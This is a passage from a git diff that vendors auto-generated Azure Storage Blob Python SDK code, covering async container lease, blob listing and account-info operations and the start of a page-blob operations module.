~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "acquire") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_acquire_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + duration=duration, + proposed_lease_id=proposed_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.acquire_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + acquire_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def release_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "release". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "release") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_release_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.release_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + release_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def renew_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "renew". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "renew") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_renew_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.renew_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + renew_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def break_lease( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + break_period: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param break_period: For a break operation, proposed duration the lease should continue before + it is broken, in seconds, between 0 and 60. This break period is only used if it is shorter + than the time remaining on the lease. If longer, the time remaining on the lease is used. A new + lease will not be available before the break period has expired, but the lease may be held for + longer than the break period. If this header does not appear with a break operation, a + fixed-duration lease breaks after the remaining lease period elapses, and an infinite lease + breaks immediately. Default value is None. + :type break_period: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "break". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "break") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_break_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + timeout=timeout, + break_period=break_period, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.break_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-time']=self._deserialize('int', response.headers.get('x-ms-lease-time')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + break_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def change_lease( # pylint: disable=inconsistent-return-statements + self, + lease_id: str, + proposed_lease_id: str, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """[Update] establishes and manages a lock on a container for delete operations. The lock duration + can be 15 to 60 seconds, or can be infinite. + + :param lease_id: Specifies the current lease ID on the resource. + :type lease_id: str + :param proposed_lease_id: Proposed lease ID, in a GUID string format. The Blob service returns + 400 (Invalid request) if the proposed lease ID is not in the correct format. See Guid + Constructor (String) for a list of valid GUID string formats. + :type proposed_lease_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "lease". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword action: Describes what lease action to take. Default value is "change". Note that + overriding this default value may result in unsupported behavior. + :paramtype action: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "lease") # type: str + restype = kwargs.pop('restype', "container") # type: str + action = kwargs.pop('action', "change") # type: str + + _if_modified_since = None + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_change_lease_request( + url=self._config.url, + comp=comp, + restype=restype, + action=action, + version=self._config.version, + lease_id=lease_id, + proposed_lease_id=proposed_lease_id, + timeout=timeout, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.change_lease.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-id']=self._deserialize('str', response.headers.get('x-ms-lease-id')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + change_lease.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def list_blob_flat_segment( + self, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListBlobsFlatSegmentResponse": + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsFlatSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsFlatSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsFlatSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_flat_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_flat_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsFlatSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_flat_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def list_blob_hierarchy_segment( + self, + delimiter: str, + prefix: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + include: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> "_models.ListBlobsHierarchySegmentResponse": + """[Update] The List Blobs operation returns a list of the blobs under the specified container. + + :param delimiter: When the request includes this parameter, the operation returns a BlobPrefix + element in the response body that acts as a placeholder for all blobs whose names begin with + the same substring up to the appearance of the delimiter character. The delimiter may be a + single character or a string. + :type delimiter: str + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify one or more datasets to include in the + response. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListBlobsIncludeItem] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListBlobsHierarchySegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListBlobsHierarchySegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListBlobsHierarchySegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_blob_hierarchy_segment_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + delimiter=delimiter, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_blob_hierarchy_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('ListBlobsHierarchySegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_blob_hierarchy_segment.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs: Any + ) -> None: + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}/{containerName}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py new file mode 100644 index 0000000..5765ca0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_page_blob_operations.py @@ -0,0 +1,1397 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._page_blob_operations import build_clear_pages_request, build_copy_incremental_request, build_create_request, build_get_page_ranges_diff_request, build_get_page_ranges_request, build_resize_request, build_update_sequence_number_request, build_upload_pages_from_url_request, build_upload_pages_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class PageBlobOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`page_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + blob_content_length: int, + timeout: Optional[int] = None, + tier: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] = None, + metadata: Optional[Dict[str, str]] = None, + blob_sequence_number: Optional[int] = 0, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Create operation creates a new page blob. + + :param content_length: The length of the request. + :type content_length: long + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param tier: Optional. Indicates the tier to be set on the page blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.PremiumPageBlobAccessTier + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "PageBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 